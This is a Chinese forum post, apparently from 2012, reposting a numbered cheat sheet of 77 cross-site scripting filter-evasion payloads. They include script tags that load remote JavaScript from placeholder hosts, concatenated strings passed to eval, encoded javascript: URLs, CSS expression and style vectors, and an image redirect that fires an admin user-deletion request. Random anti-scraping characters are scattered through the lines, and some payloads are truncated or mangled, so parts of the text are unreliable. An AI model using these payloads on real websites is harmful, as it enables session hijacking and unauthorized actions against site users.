貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
) C( W2 l- D& s; i- l, e
* ]; ]: Z4 r. f0 x3 f- Y (1)普通的XSS JavaScript注入
* n. b) L* X! P0 W" K' K <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 F% z- m l; Z+ ?- \
/ e0 x, G$ F$ I9 p (2)IMG标签XSS使用JavaScript命令" F3 S( O9 M$ u+ t/ y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ a3 [2 M5 y: ~+ J9 g
' _7 Y; B5 F, i3 R1 b8 b (3)IMG标签无分号无引号
% v6 h5 Q2 F* z3 N <IMG SRC=javascript:alert(‘XSS’)>" F# K7 ~" x; I0 P) Q
; S, u4 r6 l! U( @1 ~, t# V, W
(4)IMG标签大小写不敏感
! b" U4 r+ G4 c0 w3 L) M& P7 D# w <IMG SRC=JaVaScRiPt:alert(‘XSS’)>, W) J9 j8 w0 l, j: ?
3 V( J1 H( B* w% `& x$ X
(5)HTML编码(必须有分号)
& s7 V$ | ]7 @5 w- L <IMG SRC=javascript:alert(“XSS”)>
# p# A' c! i/ N3 b$ M6 z. n
4 `. T& H: a+ b7 Q/ f' |5 r (6)修正缺陷IMG标签; B# T& j2 Q' q2 c6 O% _0 ]5 H
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> Q- L$ W9 Y. c, e# n9 _3 e+ s ~; |
: b# L4 m/ [$ G0 u9 L$ a/ K& O (7)formCharCode标签(计算器)2 \) O% F( a7 k
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 S1 h$ f. n+ F
' I( m2 A; a; y6 a# m: L9 z (8)UTF-8的Unicode编码(计算器)' \9 C) [% S9 T7 [4 X9 ? M
<IMG SRC=jav..省略..S')>
9 @1 j* K; P3 d4 Q% P k7 j; y, r; W5 v
(9)7位的UTF-8的Unicode编码是没有分号的(计算器): u7 n5 a6 N- j$ C% F3 Y4 A9 e
<IMG SRC=jav..省略..S')>
; k) d P* r) e4 c1 O# r! V8 t; B! z7 e* @3 G2 O) ^! n0 W# A
(10)十六进制编码也是没有分号(计算器)& U9 L3 ^7 A+ Q8 `
<IMG SRC=java..省略..XSS')>9 |8 u# C4 Z m' V+ u, `
4 G1 x& g! z5 C' L (11)嵌入式标签,将Javascript分开- i* x% h7 ~4 C% A5 j
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 h, ^$ ], f& Y( {* U6 F0 U
5 `6 l% M0 `( ? N, b) T( e2 X3 Q (12)嵌入式编码标签,将Javascript分开
% D9 s6 l& j! T$ }$ M- P <IMG SRC=”jav ascript:alert(‘XSS’);”>) M$ H! H! G5 p0 @* a7 a/ ~
- Z* z! t: H8 B# O+ l
(13)嵌入式换行符* y# O' ]1 P- _7 K) N1 I% l5 Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 n/ l& \5 D% X+ h" g
7 C: X0 ]# w1 V; t6 f (14)嵌入式回车) j q" j" {2 p7 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 p' B1 o. A ^" W% o
# o& r% k9 `* c% m (15)嵌入式多行注入JavaScript,这是XSS极端的例子' N3 m- T9 b" S# Z6 c; I
<IMG SRC=”javascript:alert(‘XSS‘)”>7 B0 b: g5 m1 ?' |: R& @
. }2 M0 x( f0 I4 T
(16)解决限制字符(要求同页面)1 ~7 c) Q4 B* C/ l& ]1 Q" B
<script>z=’document.’</script>
5 ?3 W& @- r' A( K: } <script>z=z+’write(“‘</script>
% ?1 `& K- X6 l$ A; d/ q <script>z=z+’<script’</script>% o3 E6 N; q+ V% T; h+ {- K/ a3 W
<script>z=z+’ src=ht’</script>3 Z- o5 B, V$ x& V- g
<script>z=z+’tp://ww’</script>
# J5 [2 K i" t: w/ H" m <script>z=z+’w.shell’</script>
& \# d+ U8 r% S <script>z=z+’.net/1.’</script>/ h, `9 ?& y- o* Z. g1 H& s* ?+ B
<script>z=z+’js></sc’</script>7 Y" E% P r) h8 u8 I
<script>z=z+’ript>”)’</script>
, [1 M) B, l( O' v: S <script>eval_r(z)</script>
; e4 b7 S8 d' v2 l! g# _! e0 Q" [; |6 C! x! L
(17)空字符( y6 d/ ~& Z4 |* P0 `1 H* N+ S! `# F
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out ]. y. J# J6 c$ V, f9 i9 q6 h
; i& o' j' f$ Z8 M/ P$ v$ ~
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; k( B+ I: T( |# w perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
. @8 b3 Q$ U1 ~" u# ^( Z% O* @+ Q' x
(19)Spaces和meta前的IMG标签
4 D! `8 N4 z* q: `; B <IMG SRC=” � javascript:alert(‘XSS’);”>. T% O0 ~5 K' w% N$ D8 f# [! S# R
0 ^) L. o& ~1 |2 ~/ D9 a8 K1 K
(20)Non-alpha-non-digit XSS
6 u% ?% o4 h+ a <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% d5 L" q' R% Z, I3 j+ ?, J6 u) m) F6 P+ c
(21)Non-alpha-non-digit XSS to 2
5 }) `$ Y8 R9 h <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) K4 V! b- Z+ F" i: n
1 Q5 _0 o D; k2 g7 S
(22)Non-alpha-non-digit XSS to 3! Z. s+ _+ x0 z5 r6 Y1 B( r) n
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 `/ Z' U! E v
8 Q& }- J- a+ \) \ (23)双开括号
( B7 ? S7 G5 o6 ^ <<SCRIPT>alert(“XSS”);//<</SCRIPT>/ T% A5 o- Z5 f# f7 g& D2 m9 ^
: c# T5 q6 B) c9 j7 _/ H (24)无结束脚本标记(仅火狐等浏览器)2 ~+ E: I, B' Z k+ i
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) \! w. j }( o( f/ R( Y; l" _8 a, U1 F4 k' t
(25)无结束脚本标记2
& |" E' J& Y) V$ @" t <SCRIPT SRC=//3w.org/XSS/xss.js>
% P3 B) }" G+ X% F- C4 h" d n9 ^* a- ~7 L. E
(26)半开的HTML/JavaScript XSS
# |3 c# N& N+ ^' O. i1 U" R, N0 d <IMG SRC=”javascript:alert(‘XSS’)”+ ?( y7 ?- `1 t2 b# D& P/ A
# `+ N7 e1 o8 a8 n: r8 V (27)双开角括号0 S2 n( e8 p+ m) A0 D( j9 C
<iframe src=http://3w.org/XSS.html <& L+ K; u9 L+ G8 d9 |4 l& }' u
' g m' S* M# X! m9 F- G6 n' b) k
(28)无单引号 双引号 分号
. I2 C; \8 ^- [3 g <SCRIPT>a=/XSS/, v5 Z3 V+ ~ E1 l& f) V
alert(a.source)</SCRIPT>3 l5 B- l! d# x, P% w+ S \- }7 R* e, L
# J" r* H. V) O' C8 z (29)换码过滤的JavaScript
& k; C! z9 r: d$ D" S \”;alert(‘XSS’);//0 F9 X& k5 o& t/ A2 w
" Y% j5 @. J, G4 G
(30)结束Title标签
k" J9 g" x' s" K' Z" F </TITLE><SCRIPT>alert(“XSS”);</SCRIPT># m7 l. B; {' I; N
3 E$ K) E. O6 U8 O. \8 P (31)Input Image1 ?" l4 V+ U; J
<INPUT SRC=”javascript:alert(‘XSS’);”>
: a& d, _( D. @) c+ O7 y2 w: G/ b2 a+ g7 T( o5 y! l$ D
(32)BODY Image
7 Q6 e, X2 K8 Z4 p/ {$ R N9 S, ~; q2 ~ <BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 `% ~& d( b6 Y
' F) @6 ^4 k O& ^$ h) `0 G (33)BODY标签& T8 w& u( q/ {
<BODY(‘XSS’)>
4 ^/ X$ [2 p# c
- X2 z3 |# d8 n1 s (34)IMG Dynsrc( F5 S0 J9 h1 Y* \
<IMG DYNSRC=”javascript:alert(‘XSS’)”>8 K8 p1 Y' l- D
( X% k) d/ C) i' n( `0 Z6 v
(35)IMG Lowsrc
6 y, G0 ]# j' h8 o- W$ @8 N <IMG LOWSRC=”javascript:alert(‘XSS’)”>) T K3 F$ D) p& e/ N9 |
& P- b# a5 v% U (36)BGSOUND
+ y0 @5 w+ n! @ <BGSOUND SRC=”javascript:alert(‘XSS’);”>
' e5 v3 f: L2 [$ ?4 A3 U% H3 T6 x1 L
(37)STYLE sheet# U! h, h! h9 j, S' W- c" t
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 Y1 f G1 I! B4 c# Q- ~% ^- b, T6 E
(38)远程样式表
5 E. g/ o4 k; K+ Z6 H <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 s9 O4 ]: E9 Z! z" u' \( v& c7 D
( w1 n( m6 B; S% R3 | (39)List-style-image(列表式) b2 B" Z. U/ I/ } `
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 N: d' j' A* [% V' z
2 K( ?$ L$ \) n G
(40)IMG VBscript2 R% N1 F8 }+ l4 p
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS" _5 n6 k8 }" j$ T, q& s
h) W" @) M; F Y! f
(41)META链接url
; O$ F* ]2 g$ V f) X <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>$ i) x4 J% k* h+ \# l/ U( Z; J
6 `8 I$ P5 q$ b0 A1 D: T2 i, C
(42)Iframe! {& q( O& l) H) j* O6 o' k# }
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>' q& r$ E7 d6 W; u* J
/ J: o5 \6 l; A4 Q, d (43)Frame
& G' B( ~7 M N# `/ D <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
% T$ D9 ?( `; }3 F; L6 j0 O1 c/ l* H6 r" G: F
(44)Table# ?5 U0 L2 W9 \/ p% l
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# ^7 C' A% @/ R. J4 ^2 ^/ T v# `( F8 Q
(45)TD
, X) A, X' [, b2 G m8 Y <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
$ C6 B+ o, {2 C# _# q0 P
$ p, o* K& R8 M5 T (46)DIV background-image* R/ w" F% v# T! Q9 ^! o
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 y1 \$ E2 K0 N& O9 ]. y C
. o! z% y# Y3 T8 N2 j, D (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- D t P1 z* o" ` <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
0 o) A/ c, R6 h0 e, H% n% ]- Z4 H+ [ W( I0 F9 M3 g
(48)DIV expression G& i- X0 x- ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) j# t1 P: V- z4 n! |8 E* p, u' y# k# `2 s+ k+ z
(49)STYLE属性分拆表达
# H$ A- A" L7 V <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 R2 C0 g# ^" b( j3 Y) x( g/ g
/ h" u5 d8 R7 R( A4 l2 z& |/ P, b
(50)匿名STYLE(组成:开角号和一个字母开头)9 U0 R: q! Q/ {( V( ^' t$ ^ `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, c& z; X9 w2 w0 W+ B: Q
0 M, a1 N3 W8 n3 {" o9 @ (51)STYLE background-image
6 j* I4 W$ e. B8 f0 Q <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>- e. ~6 ?& l, k# a1 E
2 L3 y l" c& c4 O (52)IMG STYLE方式: y9 v7 \/ c* F) G% p
exppression(alert(“XSS”))’>
& X. f' p; a+ P6 D
7 C; Z/ b, V: Y3 I9 j (53)STYLE background
4 c+ u- M. d3 U1 a5 I1 Q- ]" T <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 c* B. N( D, T9 q" s9 I
6 W' h* w5 Z* J6 p: h
(54)BASE1 F$ ]/ i+ V5 g; ]) k! n& x
<BASE HREF=”javascript:alert(‘XSS’);//”>0 H0 s3 k! u: A5 x7 _( x
8 i+ i+ e o$ q4 y7 B, ^
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 J1 H% I) o* ~" }+ f <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED># X3 i* s4 V. q6 m! \! _
9 b2 ]/ U5 O6 @9 j
(56)在flash中使用ActionScrpt可以混进你XSS的代码! M& H: R+ q: y; ?9 o3 l7 @9 f3 @
a=”get”;
; \8 G. o& r& m/ X. s! N b=”URL(\”";1 P% t2 c' s; I/ [
c=”javascript:”;. h+ K* ] ~- P( u
d=”alert(‘XSS’);\”)”;
& w7 ]7 _* w+ @: Z eval_r(a+b+c+d);: ^6 |0 i1 G+ C
d; ?0 D( }8 i, n# G (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ d; D5 a, u& L" j+ b7 v$ t$ x2 M
<HTML xmlns:xss>7 I7 \' W& A0 \4 q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
( B& u; x/ D( B <xss:xss>XSS</xss:xss>9 P) k8 C& M, b/ t+ l! }( l6 b1 @
</HTML>
' J' \+ t5 F6 N8 b ~- O6 [( o6 G3 G! `/ ]3 h
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& y4 c6 j) J. S; n% g
<SCRIPT SRC=””></SCRIPT>3 l1 p5 a, V+ o$ |
. D* |8 v1 ~1 C (59)IMG嵌入式命令,可执行任意命令
+ I. `: f/ V" M R, s, b <IMG SRC=”http://www.XXX.com/a.php?a=b”>
: ]. r# ?' e* q) o2 |1 O# P! m- ^, d
) l) K: F1 u& y (60)IMG嵌入式命令(a.jpg在同服务器)
2 X! \( \) }( m* Z Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser$ K: U2 P. q4 `0 Q. g+ w/ B) m# R
9 t' V5 ]+ r# v+ X& N# g4 G3 K9 H# y& o (61)绕符号过滤
7 v" X8 P( _4 T2 a% ~ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 o; I3 D+ [9 p$ o1 N" |
5 v: }% _* ^+ w% J- Y0 ?- t3 U4 o5 O (62)! l8 g, g- l3 Z- \" |
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, I9 ?3 \! X6 f) ~6 w% {1 c! V
& l! Z7 ?9 Z" ~5 ^: e: Q (63), C- Y. B" b$ B
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ b2 n9 r8 w8 s! ^0 E5 e1 U7 F( ]/ n1 ~8 @1 p5 N$ |" u
(64)
/ b1 ]! `1 P+ T <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT># X; M X% y$ B6 b
8 S6 O& j8 V3 s3 C (65)
1 I! Q8 `* m0 N. r <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>0 V5 w3 |2 d, F4 B7 X" J
+ |; O1 J* Z9 B3 l& e
(66)
2 J. v. p2 e1 _: E6 O+ A+ _# l <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 K' e- S9 h1 Q7 X* h
; R9 x( {" E6 R( ^+ o) D$ X (67)
9 H, `1 ^2 e6 l: o3 ^) D( N0 H <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: x, C* n" g& h
3 Q; s1 `/ C g8 V% s/ e (68)URL绕行' y2 ^8 v: m/ W! H# B1 I
<A HREF=”http://127.0.0.1/”>XSS</A>
5 P) _2 G# J: u! n- d9 W A/ l6 ]0 S4 C
(69)URL编码* U; ^7 A* |; A! X9 ]1 H7 O
<A HREF=”http://3w.org”>XSS</A>
$ W) i. E& Q" w2 ~# X2 s" {
% L# R3 `9 W7 k; r: `; y% W# ^ (70)IP十进制
6 F% ]* Z ?! u <A HREF=”http://3232235521″>XSS</A>
! R8 W0 K6 f. T3 L# E7 V
6 T `3 @5 b9 l. ?% n1 R* R2 d (71)IP十六进制4 T5 G: n2 a& Q1 Q' R0 {: A. C& W6 z
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ y9 |8 H2 g% f' O+ K& G; ?% R1 _
) U7 k' m! ~) H% X% ] (72)IP八进制. B9 i( B& j& W( G# [* j P8 m
<A HREF=”http://0300.0250.0000.0001″>XSS</A>) |4 V; L( n- y& _4 W& e* N
7 v8 x1 e- P5 E) z- Q: B$ {' g) m
(73)混合编码
$ E6 G2 O9 Y' v$ S <A HREF=”h
7 y8 K/ g! z$ v9 v$ Q tt p://6 6.000146.0×7.147/”">XSS</A>
0 O! C$ p4 W! n/ d* }
! ^8 G; n- ^9 ?" [ (74)节省[http:]8 j. k! f9 N- A& r5 U# I9 I; w' W
<A HREF=”//www.google.com/”>XSS</A>3 l( C5 I0 K; p/ D: }
/ O/ w* h2 y4 T5 N( f6 }. ^* E
(75)节省[www]
% O8 M3 Y& D1 s! G* Z3 x <A HREF=”http://google.com/”>XSS</A>
' u2 I7 ]; c1 W
* ^+ Q R G- @ V (76)绝对点绝对DNS' {! R# m7 w# o2 X' s
<A HREF=”http://www.google.com./”>XSS</A>0 D/ W3 [, D2 [" @
; o u% `% F5 i' u# ~; G
(77)javascript链接
1 e& h7 v$ S* t& d" C p' k <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对